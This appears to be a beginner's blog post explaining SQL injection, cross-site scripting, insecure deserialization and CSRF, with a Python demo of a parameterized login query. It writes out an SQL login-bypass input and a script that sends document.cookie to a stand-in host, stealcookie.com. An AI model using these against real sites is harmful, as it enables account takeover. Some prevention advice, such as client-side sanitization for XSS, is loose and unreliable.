Prevent Website From Hackers and Secure Data Now!

Prevent your website from Hackers today

There are many websites that are vulnerable to hackers today. The truth is that no website can be 100 percent safe from hackers, as they use many techniques to steal users' data for different purposes. These are some common techniques by which your website can be attacked:

  • SQL Injection: SQL injection is a situation where the hacker injects specially crafted SQL into your queries to exploit improper input sanitization on the backend of your website. SQL is most often used to insert, delete, update and fetch data in the database. For example, to validate a user login on your website you might run the following query:

    "SELECT * FROM users WHERE username='$username' AND password='$password'"

    If the above query returns a row for the given user input, the login is valid; otherwise it is not. The user can then enter input that turns the query into

    "SELECT * FROM users WHERE username='' OR 1=1 --' AND password='$password'"

    The rest of the query is commented out because of the "--", so it always returns a row no matter what the password is.

  • Cross Site Scripting: In this attack the hacker injects malicious scripts on the client side (i.e. the browser). The hacker inserts malicious JavaScript code alongside the user input, which is sent to the server and then stored in the database. By doing so, the hacker can steal cookies, deface the website, etc. For example, the hacker might insert a script such as the one below:

    <script> window.location="stealcookie.com/cookiestealer.php?cookie="+document.cookie; </script>

    By doing so the website's cookies are compromised, which can lead to account takeover.

  • Insecure deserialization: Serialization is the process of converting data from one form to another so that both the sender and the receiver know how to handle it. When the browser sends data to the server, the server deserializes it, and when the server sends data to the browser, the browser deserializes it in turn. When data is not properly validated on both the client side and the server side, this can lead to loss of data.
  • Cross Site Request Forgery: In this method the hacker sends a forged request to the target website from a different website, using the user's own browser. This other website is hosted by the hacker himself. For instance, the hacker creates a form and sends it to the user; when the user "changes his password" through it, the change is made in the real user database. In this way the hacker can submit new records to the user's database with values of his own choosing, and the user's data can be manipulated.

How to prevent these attacks

  • SQL Injection: To prevent SQL injection, user input must be sanitized before it is used in any SQL operation.
  • Cross Site Scripting: To prevent this type of attack, user input must be properly sanitized and validated before it is sent to the server.
  • Insecure deserialization: To prevent this type of attack, user data must be properly validated before it is sent to the server.
  • Cross Site Request Forgery: This can be prevented by implementing CSRF tokens.
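The login query from the SQL Injection section and the sanitization advice above, as an added example that is not part of the original post: the string-built query is run next to a parameterized one against a constructed in-memory SQLite table, so you can see the "' OR 1=1 --" input succeed against the first and fail against the second. The table, the user row and the function names are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed in-memory database with a single user, so this runs offline.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return conn


def login_vulnerable(conn, username, password):
    # Builds the statement by string interpolation, exactly like the
    # "$username" / "$password" query in the post. The input becomes part
    # of the SQL text, so a quote and a "--" comment marker are interpreted.
    query = (f"SELECT * FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    # Bound parameters keep the input as data: the driver never lets it
    # change the structure of the statement, whatever characters it holds.
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    conn = make_db()
    payload = "' OR 1=1 --"  # the bypass input described in the post
    return {
        "valid_vuln": login_vulnerable(conn, "alice", "correct horse"),
        "bypass_vuln": login_vulnerable(conn, payload, "anything"),
        "valid_param": login_parameterized(conn, "alice", "correct horse"),
        "bypass_param": login_parameterized(conn, payload, "anything"),
    }


if __name__ == "__main__":
    for case, logged_in in demo().items():
        print(f"{case}: {'logged in' if logged_in else 'rejected'}")
```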

Always remember that websites are created by developers, and developers are human, so they can always make mistakes.

If you have any suggestions, questions or contributions, please leave a comment below.

Twitter: @Joshuauzor